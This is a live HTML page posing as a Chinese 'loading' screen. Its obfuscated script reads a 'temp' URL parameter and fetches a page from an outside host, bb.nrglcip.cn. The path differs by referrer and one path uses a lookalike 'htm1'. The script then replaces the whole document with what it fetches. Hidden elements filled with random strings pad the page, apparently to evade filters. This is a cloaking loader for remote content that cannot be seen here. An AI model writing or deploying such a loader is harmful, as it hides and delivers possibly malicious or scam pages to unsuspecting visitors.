<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .jM63rDd1j {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .jM63rDd1j .acMequ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .jM63rDd1j .content {
            line-height: 50px;
            text-align: center
        }

        .jM63rDd1j .img {
            width: 100%
        }

        .jM63rDd1j .Bjj6lfKY {
            text-align: center
        }

        .jM63rDd1j .Bjj6lfKY span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .jM63rDd1j .Bjj6lfKY span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .jM63rDd1j .Bjj6lfKY span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .jM63rDd1j .Bjj6lfKY span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .jM63rDd1j .Bjj6lfKY span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .jM63rDd1j .Bjj6lfKY span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .jM63rDd1j .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function RGgNhua9zTgZg(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var rMhDlta = RGgNhua9zTgZg('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ rMhDlta +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ rMhDlta +".html?a=share";
		}
		
        U5bfzVBA=url+"#"+new Date().getTime();
        U5bfzVBA && function() {
            $.get(U5bfzVBA, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>hKoQSAiF04Vr</a>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<b style='display:none' >rImhN4q29TysRAV5oaY1Z1bwg1argVWxYEwCVWlqRXWIzyWiC5B801eNubA</b>
<span style='display:none'>KyvQU0kaj9DffPs7xP2xNEvEVJogcisVOAqQQgaaWu5AMKQxPCBXU1lDIU5Zw6knK8LfKN3K1GWbuApubI8OujFsPZvbKOY</span>
<b style='display:none' >rImhN4q29TysRAV5oaY1Z1bwg1argVWxYEwCVWlqRXWIzyWiC5B801eNubA</b>
<h1 style='display:none' >Ny9Zopx73dgOCzNnJj2IXSWoobYhr2nuctX7oizWx8agt9jixPKdFVfj1rq2aLodw79SEhR4ni311U8jLCpCbMl</h1><div class="jM63rDd1j">
    <div class="acMequ">
        <div class="Bjj6lfKY">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<span style='display:none'>QnQYfnzhT6XGlZO4tcS9</span>
<img  src='' style='display:none'>
<div style='display:none'>Wo0rFISFtd9mJYiIXdCJ3oOXUY2r5FgY2apQf9WAzHsvOSWNmT3FxLbrTkBYmKs2xO46Jah</div>
<div style='display:none'>Wo0rFISFtd9mJYiIXdCJ3oOXUY2r5FgY2apQf9WAzHsvOSWNmT3FxLbrTkBYmKs2xO46Jah</div>
<img  src='' style='display:none'></body>
</html>